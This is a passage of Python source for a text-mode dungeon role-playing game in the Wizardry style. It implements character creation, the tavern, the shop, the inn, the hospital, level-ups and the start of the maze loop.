start=' ')\n vscr.disp_scrwin()\n else:\n break\n vscr.disp_scrwin()\n\n mw.print(\"Choose race -\")\n c = mw.input_char(\" h)uman e)lf d)warf g)nome o)hobbit\",\n values=['h', 'e', 'd', 'g', 'o'])\n if c == 'h':\n race = Race.HUMAN\n elif c == 'e':\n race = Race.ELF\n elif c == 'd':\n race = Race.DWARF\n elif c == 'g':\n race = Race.GNOME\n else:\n race = Race.HOBBIT\n mw.print(f\"{race.name.lower()}\")\n vscr.disp_scrwin()\n\n c = mw.input_char(\n \"Choose alignment - g)ood n)eutral e)vil\", values=['g', 'n', 'e'])\n if c == 'g':\n align = Align.GOOD\n elif c == 'n':\n align = Align.NEUTRAL\n else:\n align = Align.EVIL\n mw.print(f\"Alignment: {align.name.lower()}\")\n vscr.disp_scrwin()\n\n ch = Member(name, align, race)\n ch.distribute_bonus(game)\n\n\ndef inspect_characters(game):\n \"\"\"\n Inspect characters (a training grounds menu item)\n Can delete a character from here, too.\n \"\"\"\n vscr = game.vscr\n newwin = False\n mw = vscr.meswins[-1]\n if mw.height < 16:\n mw = Meswin(vscr, 10, 2, 60, 16, frame=True)\n vscr.meswins.append(mw)\n newwin = True\n mw.mes_lines = []\n vscr.disp_scrwin()\n cnum = 0\n while True:\n chlist = game.party.members\n if game.party.place == Place.TRAINING_GROUNDS:\n chlist = game.characters\n mw.mes_lines = []\n mw.print(\"Inspect characters\")\n mw.print(\" - j)down k)up i)nspect d)elete l)eave\")\n for i, mem in enumerate(chlist):\n if i == cnum:\n cur = ' >'\n else:\n cur = ' '\n mw.print(''.join([cur, str(i+1), ' ', str(mem)]), start=' ')\n vscr.disp_scrwin()\n c = getch()\n if c == 'l':\n break\n elif c == 'j' and cnum < len(chlist)-1:\n cnum += 1\n elif c == 'k' and cnum > 0:\n cnum -= 1\n elif c == 'i' and len(chlist) > 0:\n while True:\n rtn = chlist[cnum].inspect_character(game)\n if rtn == 0:\n break\n cnum += rtn\n if cnum < 0:\n cnum = len(chlist)-1\n elif cnum >= len(chlist):\n cnum = 0\n elif c == 'd' and len(chlist) > 0 and \\\n mem not in game.party.members:\n mem = chlist[cnum]\n nw = Meswin(vscr, 16, 8, 54, 3, frame=True)\n vscr.meswins.append(nw)\n c = nw.input_char(f\"Delete {mem.name} permanently? 
(y/n)\",\n values=['y', 'n'])\n if c == 'y':\n chlist.remove(mem)\n nw.print(f\"{mem.name} is deleted.\")\n if cnum >= len(chlist):\n cnum -= 1\n vscr.disp_scrwin()\n getch(wait=True)\n vscr.meswins.pop()\n if newwin:\n vscr.meswins.pop()\n vscr.cls()\n\n\ndef training(game):\n \"\"\"\n Training grounds main (an edge of town menu item)\n \"\"\"\n vscr = game.vscr\n game.party.place = Place.TRAINING_GROUNDS\n mw = vscr.meswins[-1]\n vscr.cls()\n vscr.disp_scrwin()\n while True:\n mw.print(\n \"\\n*** training grounds ***\\nc)reate a character\\ni)nspect a character\\nl)eave\", start=' ')\n vscr.disp_scrwin()\n c = mw.input_char(\"Command?\", values=['c', 'i', 'l'])\n if c == 'l':\n break\n elif c == 'c':\n create_character(game)\n elif c == 'i':\n inspect_characters(game)\n\n\ndef tavern_add(game):\n \"\"\"\n Add members to the party (a tavern item)\n \"\"\"\n vscr = game.vscr\n mw = vscr.meswins[-1]\n if len(game.party.members) >= 6:\n mw.print(\"Party full.\")\n vscr.disp_scrwin()\n return\n\n vscr.disp_scrwin()\n chwin = Meswin(vscr, 12, 2, 40, 16)\n vscr.meswins.append(chwin)\n top = idx = 0\n while True:\n chlines = []\n i = 0\n charlist = [\n ch for ch in game.characters\n if (ch not in game.party.members and not ch.in_maze)]\n for i, ch in enumerate(charlist):\n cur = ' '\n if i == idx:\n cur = '>'\n cur_ch = ch\n chline = f\"| {cur}{i+1:2} {ch.name.ljust(16)} Lv{ch.level:3d} {ch.race.name[:3]}-{ch.align.name[:1]}-{ch.job.name[:3]}\"\n chlines.append(chline)\n chwin.mes_lines = []\n chwin.mes_lines.append(\n \"| Add who to the party?\".ljust(chwin.width-1)+'|')\n chwin.mes_lines.append(\n \"| - j)down k)up x)choose l)eave\".ljust(chwin.width-1)+'|')\n for chl in chlines[top:top+chwin.height-2]:\n chwin.mes_lines.append(chl.ljust(chwin.width-1)+'|')\n vscr.disp_scrwin()\n c = getch(wait=True)\n if c == 'l':\n break\n elif c == 'j' and idx < len(charlist)-1:\n idx += 1\n top = max(0, idx-chwin.height+3)\n elif c == 'k' and idx > 0:\n idx -= 1\n top = min(top, idx)\n elif c == 'x':\n game.party.members.append(cur_ch)\n if idx >= len(charlist)-1:\n idx -= 1\n if len(game.party.members) >= 6 or len(charlist) <= 1:\n break\n vscr.meswins.pop()\n vscr.cls()\n vscr.disp_scrwin()\n\n\ndef tavern(game):\n \"\"\"\n tavern (a castle item)\n add/remove members to the party, inspect, divide golds, etc.\n \"\"\"\n game.party.place = Place.HAWTHORNE_TAVERN\n vscr = game.vscr\n mw = vscr.meswins[-1]\n newwin = False\n if mw.height < 16:\n mw = Meswin(vscr, 8, 2, 64, 16, frame=True)\n vscr.meswins.append(mw)\n newwin = True\n ch = ''\n while True:\n mw.print(\"\\n*** The Hawthorne Tavern ***\", start=' ')\n vscr.disp_scrwin()\n ch = mw.input_char(\"Command? 
- a)dd r)emove i)nspect d)ivvy gold l)eave\",\n values=['a', 'r', 'i', 'd', 'l', '^'])\n if ch == 'l':\n game.party.place = Place.CASTLE\n break\n elif ch == '^' and config['debug']:\n mw.print(\"debug twice!\")\n for mem in game.party.members:\n mem.exp *= 2\n mem.gold *= 2\n elif ch == 'd':\n if not game.party.members:\n continue\n total = sum(mem.gold for mem in game.party.members)\n each = total // len(game.party.members)\n for mem in game.party.members:\n total -= each\n mem.gold = each\n mem.gold += total # remaining\n elif ch == 'a':\n if len(game.party.members) < len(game.characters):\n tavern_add(game)\n else:\n mw.print(\"No characters to add\")\n elif ch == 'i':\n if not game.party.members:\n continue\n idx = 0\n while True:\n mem = game.party.members[idx]\n rtn = mem.inspect_character(game)\n if rtn == 0:\n break\n idx += rtn\n if idx < 0:\n idx = len(game.party.members) - 1\n elif idx >= len(game.party.members):\n idx = 0\n elif ch == 'r':\n game.party.remove_character(game)\n if newwin:\n vscr.meswins.pop()\n vscr.cls()\n\n\ndef trader_buy(game, mem):\n \"\"\"\n a member chooses and buys items from shop inventory\n \"\"\"\n vscr = game.vscr\n iw = Meswin(vscr, 12, 1, 48, 12, frame=True)\n vscr.meswins.append(iw)\n top = idx = page = 0\n pages = (('weapon'), ('armor'), ('shield', 'helm', 'gloves'),\n ('ring', 'item'))\n while True:\n items = [item for item in game.shopitems if game.shopitems[item] > 0\n and game.itemdef[item].type in pages[page]]\n ilines = []\n for i, item in enumerate(items):\n cur = ' '\n if i == idx:\n cur = '>'\n cur_item = i\n afford = canequip = ' '\n if mem.job.name[:1].lower() not in game.itemdef[item].jobs.lower():\n canequip = '#'\n if mem.gold >= game.itemdef[item].price:\n afford = '$'\n iline = f\"{cur}{i+1:2} {item.ljust(iw.width-24)[:iw.width-24]} {game.itemdef[item].price:10d}{canequip}{afford}\"\n ilines.append(iline)\n iw.mes_lines = []\n iw.mes_lines.append(\n f\"{mem.name} has {mem.gold} gold\")\n iw.mes_lines.append(\" jk)cursor x)choose hl)page ;)leave\")\n for il in ilines[top:top+iw.height-2]:\n iw.mes_lines.append(il.ljust(iw.width-6))\n for _ in range(iw.width - len(iw.mes_lines)):\n iw.mes_lines.append(' '*(iw.width-6))\n vscr.disp_scrwin()\n c = getch(wait=True)\n if c == ';':\n break\n elif c == 'j' and idx < len(items)-1:\n idx += 1\n top = max(0, idx-iw.height+3)\n elif c == 'k' and idx > 0:\n idx -= 1\n top = min(top, idx)\n elif c == 'h':\n idx = top = 0\n page -= 1\n if page < 0:\n page = len(pages)-1\n elif c == 'l':\n idx = top = 0\n page += 1\n if page >= len(pages):\n page = 0\n elif c == 'x':\n if len(mem.items) >= 8:\n iw.mes_lines[0] = \"Looks like, your bag is full.\"\n vscr.disp_scrwin()\n getch()\n elif mem.gold < game.itemdef[items[idx]].price:\n iw.mes_lines[0] = \"Sorry, you can't afford it.\"\n iw.mes_lines[1] = f\"Will someone else pay? 
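The `d)ivvy gold` branch above pools the party's gold, gives every member `total // n`, and leaves the integer-division remainder with the last member iterated. The same arithmetic as a standalone sketch (`divvy` and the sample amounts are illustrative):

```python
def divvy(golds):
    """Split party gold evenly; leftover coins go to the last member."""
    total = sum(golds)
    each = total // len(golds)
    shares = [each] * len(golds)
    shares[-1] += total - each * len(golds)
    return shares

# Six members holding 1000 gold in total:
print(divvy([1000, 0, 0, 0, 0, 0]))  # [166, 166, 166, 166, 166, 170]
```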
(y/n)>\"\n vscr.disp_scrwin()\n c = getch(wait=True)\n if c == 'y':\n if game.party.pay(game.itemdef[items[idx]].price):\n bought = [items[idx], False, False, False]\n mem.items.append(bought)\n game.shopitems[items[idx]] -= 1\n iw.mes_lines[0] = \"Anything else, noble sir?\"\n else:\n iw.mes_lines[0] = \"Oh, I'm sorry.\"\n iw.mes_lines[1] = \"\"\n vscr.disp_scrwin()\n getch(wait=True)\n\n else:\n iw.mes_lines[0] = \"Anything else, noble sir?\"\n mem.gold -= game.itemdef[items[idx]].price\n bought = [items[idx], False, False, False]\n mem.items.append(bought)\n game.shopitems[items[idx]] -= 1\n vscr.disp_scrwin()\n getch()\n vscr.cls()\n vscr.meswins.pop()\n\n\ndef trader_sell(game, mem, op):\n \"\"\"\n sell, uncurse or identify items\n \"\"\"\n vscr = game.vscr\n mw = vscr.meswins[-1]\n if op == 's':\n opword = 'sell'\n div = 2\n elif op == 'u':\n opword = 'uncurse'\n div = 2\n else:\n opword = 'identify'\n div = 4\n\n mw.print(f\"Which item to {opword}? - # or leave\")\n idic = {}\n for i, item in enumerate(mem.items, 1):\n dispname = item[0]\n mark = ' '\n if op == 'u': # uncurse\n if not item[2]:\n continue\n mark = '&'\n if item[3]:\n dispname = ''.join(['?', game.itemdef[item[0]].unident])\n elif op == 'i': # identify\n if (not item[3]) or item[2]:\n continue\n dispname = ''.join(['?', game.itemdef[item[0]].unident])\n else: # sell\n if item[1] or item[2] or item[3]:\n continue\n price = game.itemdef[item[0]].price//div\n if op == 'i':\n price = min(1000, max(price, 20))\n mw.print(\n f\"{i}){mark}{dispname.ljust(24)} {price}\",\n start=' ')\n idic[i] = (item[0], dispname, price)\n\n while True:\n c = mw.input_char(\"# or l)eave\")\n if c == 'l':\n return\n try:\n if int(c) in idic:\n break\n except:\n continue\n game.shopitems[idic[int(c)][0]] += 1\n price = idic[int(c)][2]\n if op == 's':\n if price == 0:\n mw.print(\"Sorry, but not interested.\")\n else:\n mem.gold += price\n del mem.items[int(c)-1]\n mw.print(\"I'm sure fellows'll want it.\")\n elif op == 'i':\n if mem.gold < price:\n mw.print(\"Oh, you can't afford it.\")\n yn = mw.input_char(\"Someone else will pay? (y/n)\",\n values=['y', 'n'])\n if yn == 'y':\n game.party.pay(price)\n else:\n mw.print(\"Ok, fine.\")\n return\n else:\n mem.gold -= price\n mem.items[int(c)-1][3] = False # identified\n mw.print(f\"Identified as {mem.items[int(c)-1][0]}.\")\n else:\n if mem.gold < price:\n mw.print(\"Um, you can't afford it.\")\n yn = mw.input_char(\"Someone else will pay? 
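`trader_sell` above quotes half the list price for selling and uncursing (`div = 2`) and a quarter for identification (`div = 4`), with the identify fee clamped between 20 and 1000 gold. The quote logic, pulled out into a sketch (`quote` is my name for it):

```python
def quote(list_price, op):
    """Gold quoted by Trader Jay's for s)ell, u)ncurse or i)dentify."""
    div = 4 if op == 'i' else 2   # identify: 1/4 price; sell/uncurse: 1/2
    price = list_price // div
    if op == 'i':
        price = min(1000, max(price, 20))  # clamp the identify fee
    return price

print(quote(25, 's'))     # a 25-gold item sells back for 12
print(quote(25, 'i'))     # cheap items: fee clamped up to 20
print(quote(15000, 'i'))  # pricey items: fee clamped down to 1000
```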
(y/n)\",\n values=['y', 'n'])\n if yn == 'y':\n game.party.pay(price)\n else:\n mw.print(\"Ok, fine.\")\n return\n else:\n mem.gold -= price\n mw.print(f\"Uncursed {mem.items[int(c)-1][0]}.\")\n del mem.items[int(c)-1]\n\n game.vscr.disp_scrwin()\n getch()\n\n\ndef trader(game):\n \"\"\"\n shop (a castle item)\n choose a member and he/she buys, sells items, etc.\n \"\"\"\n if not game.party.members:\n return\n game.party.place = Place.TRADER_JAYS\n vscr = game.vscr\n mw = vscr.meswins[-1]\n while True:\n mw.print(\"\\n*** Trader Jay's ***\", start=' ')\n vscr.disp_scrwin()\n mem = game.party.choose_character(game)\n if not mem:\n break\n while True:\n mw.print(f\"Welcome, {mem.name}.\")\n mw.print(f\" You have {mem.gold} gold.\")\n ch = mw.input_char(f\"b)uy s)ell u)ncurse i)dentify p)ool gold l)eave\",\n values=['b', 's', 'u', 'i', 'p', 'l'])\n if ch == 'l':\n break\n elif ch == 'b':\n trader_buy(game, mem)\n elif ch in 'sui':\n trader_sell(game, mem, ch)\n elif ch == 'p':\n gold = 0\n for c in game.party.members:\n gold += c.gold\n c.gold = 0\n mem.gold = gold\n\n\ndef levelup(game, m):\n \"\"\"\n Check and levelup the member.\n Returns the number of level-ups and if learned spell(s).\n \"\"\"\n levelup = 0\n learned = False\n while True:\n if m.level < 13:\n next = level_table[m.job][m.level-1]\n else:\n next = level_table[m.job][11] + \\\n level_table[m.job][12]*(m.level-12)\n m.nextexp = next\n if next > m.exp:\n return levelup, learned\n\n levelup += 1\n\n for i in range(6):\n r = random.randrange(100)\n if r < 15: # 15%\n m.stat[i] -= 1\n elif r >= 55: # 55%\n m.stat[i] += 1\n m.stat[i] = min(m.stat[i], race_status[m.race][i]+10)\n\n m.level += 1\n newhp = 0\n if m.stat[3] <= 3:\n plus = -2\n elif m.stat[3] <= 5:\n plus = -1\n elif m.stat[3] >= 20:\n plus = 4\n elif m.stat[3] >= 18:\n plus = 3\n elif m.stat[3] >= 16:\n plus = 2\n elif m.stat[3] >= 15:\n plus = 1\n else:\n plus = 0\n\n jobdice = {\n Job.FIGHTER: '1D10',\n Job.LORD: '1D10',\n Job.PRIEST: '1D8',\n Job.SAMURAI: '1D8',\n Job.THIEF: '1D6',\n Job.BISHOP: '1D6',\n Job.NINJA: '1D6',\n Job.MAGE: '1D4',\n }\n d = jobdice[m.job]\n times = m.level\n if m.job == Job.SAMURAI:\n times += 1\n for _ in range(times):\n p = dice(d) + plus\n if p < 1:\n p = 1\n newhp += p\n\n if newhp > m.maxhp:\n m.maxhp = newhp\n else:\n m.maxhp += 1\n\n m.hp = m.maxhp\n\n if m.job == Job.MAGE:\n sc = game.spell.spell_counts(0, 2, m.level)\n for i in range(len(sc)):\n m.mspell_max[i] = min(9, max(sc[i], m.mspell_max[i]))\n elif m.job == Job.PRIEST:\n sc = game.spell.spell_counts(0, 2, m.level)\n for i in range(len(sc)):\n m.pspell_max[i] = min(9, max(sc[i], m.pspell_max[i]))\n elif m.job == Job.BISHOP:\n sc = game.spell.spell_counts(0, 4, m.level)\n for i in range(len(sc)):\n m.mspell_max[i] = min(9, max(sc[i], m.mspell_max[i]))\n sc = game.spell.spell_counts(3, 4, m.level)\n for i in range(len(sc)):\n m.pspell_max[i] = min(9, max(sc[i], m.pspell_max[i]))\n elif m.job == Job.SAMURAI:\n sc = game.spell.spell_counts(3, 3, m.level)\n for i in range(len(sc)):\n m.mspell_max[i] = min(9, max(sc[i], m.mspell_max[i]))\n elif m.job == Job.LORD:\n sc = game.spell.spell_counts(3, 2, m.level)\n for i in range(len(sc)):\n m.pspell_max[i] = min(9, max(sc[i], m.pspell_max[i]))\n\n for sname in game.spelldef:\n if game.spelldef[sname].categ == 'mage':\n # memorize the spell if iq > randrange(30), he/she\n # has not learned it yet and the spell count of the level > 0\n if m.stat[1] > random.randrange(30): # iq\n if sname not in m.mspells and \\\n 
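The hit-point part of `levelup` above rerolls max HP from scratch: one hit die per (new) level — d10 for fighters and lords, d8 for priests and samurai (samurai roll one extra die), d6 for thieves, bishops and ninjas, d4 for mages — with each die adjusted by a vitality modifier and floored at 1; if the reroll fails to beat the old maximum, max HP rises by just 1. A sketch under those rules (plain-string job names stand in for the `Job` enum):

```python
import random

JOBDICE = {'fighter': 10, 'lord': 10, 'priest': 8, 'samurai': 8,
           'thief': 6, 'bishop': 6, 'ninja': 6, 'mage': 4}

def vit_plus(vit):
    """Per-die HP modifier from vitality, as in levelup()."""
    if vit <= 3: return -2
    if vit <= 5: return -1
    if vit >= 20: return 4
    if vit >= 18: return 3
    if vit >= 16: return 2
    if vit >= 15: return 1
    return 0

def reroll_maxhp(job, level, vit, old_maxhp):
    """Reroll max HP: one (modified, min 1) die per level; samurai +1 die."""
    times = level + (1 if job == 'samurai' else 0)
    newhp = sum(max(1, random.randint(1, JOBDICE[job]) + vit_plus(vit))
                for _ in range(times))
    return newhp if newhp > old_maxhp else old_maxhp + 1

print(reroll_maxhp('fighter', 5, 16, 40))
```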
m.mspell_max[game.spelldef[sname].level-1] > 0:\n m.mspells.append(sname)\n learned = True\n # memorize the 1st spell of the level if he/she\n # has not memorized any spell of the level but\n # his/her spell count of the level > 0\n if m.mspell_max[game.spelldef[sname].level-1] > 0 and \\\n sum(1 for spl in m.mspells if\n game.spelldef[spl].level == game.spelldef[sname].level) == 0:\n m.mspells.append(sname)\n learned = True\n else:\n if m.stat[2] > random.randrange(30): # piety\n if sname not in m.pspells and \\\n m.pspell_max[game.spelldef[sname].level-1] > 0:\n m.pspells.append(sname)\n learned = True\n if m.pspell_max[game.spelldef[sname].level-1] > 0 and \\\n sum(1 for spl in m.pspells if\n game.spelldef[spl].level == game.spelldef[sname].level) == 0:\n m.pspells.append(sname)\n learned = True\n mspells = []\n pspells = []\n for sname in game.spelldef: # reorder\n if sname in m.mspells:\n mspells.append(sname)\n elif sname in m.pspells:\n pspells.append(sname)\n m.mspells = mspells\n m.pspells = pspells\n\n for idx in range(7):\n know = sum(1 for s in m.mspells if\n game.spelldef[s].level == idx+1 and\n game.spelldef[s].categ == 'mage')\n m.mspell_max[idx] = max(m.mspell_max[idx], know)\n know = sum(1 for s in m.pspells if\n game.spelldef[s].level == idx+1 and\n game.spelldef[s].categ == 'priest')\n m.pspell_max[idx] = max(m.pspell_max[idx], know)\n\n\ndef sleep(game, m, healhp):\n \"\"\"\n Sleep a night. Heal hp, restore MPs and check for level-ups.\n \"\"\"\n v = game.vscr\n mw = v.meswins[-1]\n mw.print(f\"{m.name} went to bed...\")\n v.disp_scrwin()\n getch(wait=True)\n\n oldstate = m.stat[:]\n oldhp = m.maxhp\n levels, learned = levelup(game, m)\n\n m.hp += healhp\n if m.hp > m.maxhp:\n m.hp = m.maxhp\n\n m.mspell_cnt = m.mspell_max[:]\n m.pspell_cnt = m.pspell_max[:]\n\n if levels > 0:\n mw.print(f\"Level up!\")\n if m.stat[0] > oldstate[0]:\n mw.print(f\"Gained strength by {m.stat[0]-oldstate[0]} points.\")\n elif m.stat[0] < oldstate[0]:\n mw.print(f\"Lost strength by {oldstate[0]-m.stat[0]} points.\")\n if m.stat[1] > oldstate[1]:\n mw.print(\n f\"Gained i.q. by {m.stat[1]-oldstate[1]} points.\", start=' ')\n elif m.stat[1] < oldstate[1]:\n mw.print(\n f\"Lost i.q. 
by {oldstate[1]-m.stat[1]} points.\", start=' ')\n if m.stat[2] > oldstate[2]:\n mw.print(\n f\"Gained piety by {m.stat[2]-oldstate[2]} points.\", start=' ')\n elif m.stat[2] < oldstate[2]:\n mw.print(\n f\"Lost piety by {oldstate[2]-m.stat[2]} points.\", start=' ')\n if m.stat[3] > oldstate[3]:\n mw.print(\n f\"Gained vitality by {m.stat[3]-oldstate[3]} points.\", start=' ')\n elif m.stat[3] < oldstate[3]:\n mw.print(\n f\"Lost vitality by {oldstate[3]-m.stat[3]} points.\", start=' ')\n if m.stat[4] > oldstate[4]:\n mw.print(\n f\"Gained agility by {m.stat[4]-oldstate[4]} points.\", start=' ')\n elif m.stat[4] < oldstate[4]:\n mw.print(\n f\"Lost agility by {oldstate[4]-m.stat[4]} points.\", start=' ')\n if m.stat[5] > oldstate[5]:\n mw.print(\n f\"Gained luck by {m.stat[5]-oldstate[5]} points.\", start=' ')\n elif m.stat[5] < oldstate[5]:\n mw.print(\n f\"Lost luck by {oldstate[5]-m.stat[5]} points.\", start=' ')\n if m.maxhp > oldhp:\n mw.print(\n f\"Your hp increased by {m.maxhp-oldhp} points.\", start=' ')\n elif m.maxhp < oldhp:\n mw.print(\n f\"Your hp decreased by {oldhp-m.maxhp} points.\", start=' ')\n if learned:\n mw.print(f\"Leaned new spells.\", start=' ')\n v.disp_scrwin()\n getch(wait=True)\n\n\ndef inn(game):\n if not game.party.members:\n return\n v = game.vscr\n game.party.place = Place.LAKEHOUSE_INN\n mw = v.meswins[-1]\n num = len(game.party.members)\n gold = sum(m.gold for m in game.party.members)\n mw.print(\"\\n*** The Lakehouse Inn ***\", start=' ')\n mw.print(f\"Welcome. You must be very tired.\", start=' ')\n mw.print(f\"You have {gold} gold in total.\", start=' ')\n mw.print(f\"c)ots {2*num:4d} gold\", start=' ')\n mw.print(f\"s)tandard rooms {20*num:4d} gold\", start=' ')\n mw.print(f\"d)elux rooms {100*num:4d} gold\", start=' ')\n mw.print(f\"v)lake view suites {500*num:4d} gold\", start=' ')\n mw.print(f\"p)residential suites {2000*num:4d} gold\", start=' ')\n mw.print(f\"or l)eave\", start=' ')\n c = mw.input_char(\"Which rooms to stay today?\",\n values=['c', 's', 'd', 'v', 'p', 'l'])\n if c == 'l':\n return\n elif c == 'c':\n uprice = 2\n dinner = 'cabbage soup'\n elif c == 's':\n uprice = 20\n dinner = random.choice(['juicy hamburgers', 'pork and scallion',\n 'chiken pho', 'dana masala',\n 'beef and broccoli', 'pizza slices'])\n elif c == 'd':\n uprice = 100\n dinner = random.choice(['grilled sword fish', 'ribeye steak',\n 'temaki sushi', 'lamb chops', 'fillet mignon',\n 'maine lobster roll', 'juicy white asparagus'])\n elif c == 'v':\n uprice = 500\n dinner = random.choice([\"wine and dry-aged beef fillet mignon\",\n \"california wine and kobe beef NY strip steak\",\n \"ooma kuromaguro toro tuna sushi\"])\n else: # presidential suites\n uprice = 2000\n dinner = random.choice(['supreme course w/ champagne',\n \"chef's special w/ vintage wine\",\n \"jiro sushi w/ daiginjyo sake\",\n \"manchu-han imperial feast course\"])\n if not game.party.pay(uprice*num):\n mw.print(\"You can't afford the room.\")\n v.disp_scrwin()\n return\n mw.print(f\"Today's dinner is {dinner}.\")\n for mem in game.party.members:\n sleep(game, mem, uprice*2)\n\n\ndef hospital(game):\n if not game.party.members:\n return\n v = game.vscr\n game.party.place = Place.MGH\n mw = v.meswins[-1]\n num = len(game.party.members)\n gold = sum(m.gold for m in game.party.members)\n pricing = {\n State.PARALYZED: 50,\n State.STONED: 100,\n State.DEAD: 200,\n State.ASHED: 500,\n }\n mw.print(\"\\n *** Moss General Hospital ***\", start=' ')\n v.disp_scrwin()\n hlist = game.hospitalized[:]\n for p in 
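`inn()` above prices rooms per member — 2, 20, 100, 500 or 2000 gold for cots up through the presidential suites — and `sleep()` then heals each member twice the unit price in HP. The rate card as a quick sketch (`ROOMS` and `inn_bill` are my names):

```python
ROOMS = {  # key: (gold per member, hp healed each) — rates from inn()
    'c': (2, 4),        # cots
    's': (20, 40),      # standard rooms
    'd': (100, 200),    # deluxe rooms
    'v': (500, 1000),   # lake view suites
    'p': (2000, 4000),  # presidential suites
}

def inn_bill(room, party_size):
    """Total bill for one night, plus per-member HP healed."""
    uprice, heal = ROOMS[room]
    return uprice * party_size, heal

print(inn_bill('s', 6))  # (120, 40): 120 gold, and 40 hp healed each
```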
hlist:\n price = pricing[p.state] * p.level\n mw.print(\n f\"{p.name} is in ER and in a dangerous condition.\")\n mw.print(\n f\"Would someone pay for {p.name}? It would be {price} gold.\")\n c = mw.input_char(\"Pay? (y/n)\", values=['y', 'n'])\n if c == 'y':\n if not game.party.pay(price):\n mw.print(\"You can't afford it.\")\n v.disp_scrwin()\n continue\n if p.state == State.DEAD and \\\n random.randrange(100) > 50 + (3*p.stat[3]):\n mw.print(\"Oops..\")\n v.disp_scrwin()\n p.state = State.ASHED\n elif p.state == State.ASHED and \\\n random.randrange(100) > 40 + (3*p.stat[3]):\n mw.print(\"...(oh my god)...\")\n v.disp_scrwin()\n p.state = State.LOST\n else:\n mw.print(f\"{p.name} was cured.\")\n v.disp_scrwin()\n game.hospitalized.remove(p)\n p.state = State.OK\n p.hp = p.maxhp\n getch(wait=True)\n mw.print(\"They left MGH.\")\n v.disp_scrwin()\n getch(wait=True)\n\n\ndef castle(game):\n \"\"\"\n castle main\n dispatch to tavern, shop, inn or temple\n \"\"\"\n vscr = game.vscr\n mw = vscr.meswins[-1]\n vscr.cls()\n vscr.disp_scrwin()\n ch = ''\n while True:\n mw.cls()\n game.party.place = Place.CASTLE\n mw.print(\"*** Castle ***\", start=' ')\n mw.print(\"h)awthorne tavern\\nt)rader jay's\\ni)lakehouse inn\", start=' ')\n mw.print(\"m)oss general hospital\\ne)dge of town\", start=' ')\n vscr.disp_scrwin()\n ch = mw.input_char(\"Command?\", values=['h', 'e', 't', 'i', 'm'])\n if ch == 'h':\n tavern(game)\n elif ch == 'e':\n game.party.place = Place.EDGE_OF_TOWN\n break\n elif ch == 't':\n trader(game)\n elif ch == 'i':\n inn(game)\n elif ch == 'm':\n hospital(game)\n\n\ndef edge_town(game):\n \"\"\"\n edge of town main\n dispatch to training grounds\n \"\"\"\n vscr = game.vscr\n mw = vscr.meswins[-1]\n ch = ''\n while ch != 'c':\n mw.cls()\n game.party.place = Place.EDGE_OF_TOWN\n mw.print(\"*** Edge of Town ***\", start=' ')\n mw.print(\n \"m)aze\\nt)raining grounds\\nc)astle\\nS)ave and quit game\\nR)esume from saved data\", start=' ')\n vscr.disp_scrwin()\n ch = mw.input_char(\"Command? 
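The hospital loop above charges `base * level` (50/100/200/500 gold for paralyzed/stoned/dead/ashed patients), and a paid cure can still fail: raising the dead misses when `randrange(100) > 50 + 3*vitality` (the patient turns to ashes), and restoring ashes misses when the roll exceeds `40 + 3*vitality` (the character is lost). The implied success odds, worked out (note `randrange(100)` yields 0..99):

```python
def revive_chance(state, vit):
    """Success probability (%) of an MGH cure, per hospital().

    The cure fails only on rolls strictly above the threshold, so
    threshold + 3*vit + 1 of the 100 possible rolls succeed.
    """
    threshold = {'DEAD': 50, 'ASHED': 40}.get(state)
    if threshold is None:
        return 100  # paralyzed/stoned cures never fail
    return min(100, threshold + 3 * vit + 1)

print(revive_chance('DEAD', 10))   # 81 — rolls 0..80 succeed
print(revive_chance('ASHED', 10))  # 71
print(revive_chance('DEAD', 17))   # 100 — the threshold tops the die
```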
\", values=['t', 'S', 'm', 'c', 'R'])\n if ch == 't':\n training(game)\n elif ch == 'c':\n game.party.place = Place.CASTLE\n break\n elif ch == 'm':\n if game.party.members:\n game.party.place = Place.MAZE\n else:\n mw.print(\"No party members.\")\n break\n elif ch == 'S':\n game.save()\n mw.print(\"Thank you for playing.\")\n mw.print(\"See you soon.\")\n vscr.disp_scrwin()\n sys.exit()\n elif ch == 'R':\n if game.load():\n mw.print(\"loaded.\")\n vscr.disp_scrwin()\n break\n\n\ndef camp(game, floor_obj):\n \"\"\"\n Camp main\n \"\"\"\n game.party.place = Place.CAMP\n v = game.vscr\n mw = Meswin(v, 10, 1, 64, 17, frame=True)\n v.meswins.append(mw)\n\n while not game.party.floor_move: # tsubasa?\n mw.print(\n \"*** Camp ***\\ni)nspect\\nr)eorder party\\nh)eal all members\\np)rep for adventure\\nS)ave and quit game\\nl)eave\")\n c = mw.input_char(\"Command?\", values=['i', 'r', 'S', 'l', 'h', 'p'])\n if c == 'l':\n break\n elif c == 'r':\n game.party.reorder(game)\n elif c == 'h':\n game.party.heal(game)\n elif c == 'p':\n game.party.prep(game)\n elif c == 'S':\n game.party.place = Place.MAZE\n game.save()\n mw.print(\"Thank you for playing.\")\n mw.print(\"See you again soon.\")\n v.disp_scrwin()\n sys.exit()\n elif c == 'i':\n idx = 1\n while not game.party.floor_move: # tsubasa?\n mem = game.party.members[idx-1]\n rtn = mem.inspect_character(game)\n if rtn == 0:\n break\n idx += rtn\n if idx < 0:\n idx = len(game.party.members) - 1\n elif idx >= len(game.party.members):\n idx = 0\n\n v.disp_scrwin(floor_obj)\n v.meswins.pop()\n game.party.place = Place.MAZE\n\n\ndef maze(game):\n \"\"\"\n Maze (dungeon) main\n \"\"\"\n\n vscr = game.vscr\n meswins_save = vscr.meswins\n meswin = vscr.meswins[0]\n vscr.meswins = [meswin]\n\n dungeon = game.dungeon\n party = game.party\n\n if not party.resumed and\\\n party.place in [Place.MAZE, Place.CAMP, Place.BATTLE]:\n party.place = Place.MAZE\n party.floor = 0\n party.floor_move = 1 # 0: no, 1: down, 2: up\n\n dungeon.floors = [] # initialize every time\n party.floor_obj = floor_obj = None\n party.resumed = False\n\n while True:\n dungeon.generate_move_floors()\n floor_obj = party.floor_obj\n\n if party.light_cnt > 0: # milwa/lomilwa counter\n party.light_cnt -= 1\n\n party.calc_hpplus(game)\n for mem in party.members:\n if mem.state not in [State.DEAD, State.ASHED, State.LOST]:\n mem.hp = max(1, mem.hp+mem.hpplus)\n\n vscr.disp_scrwin()\n\n rt = floor_obj.check_event(game)\n if party.defeated(): # Defeated by boss monster?\n break\n if not rt: # event processed\n rtn = game.battle.check_battle()\n if rtn: # 1: random or 2: room (or 3?) 
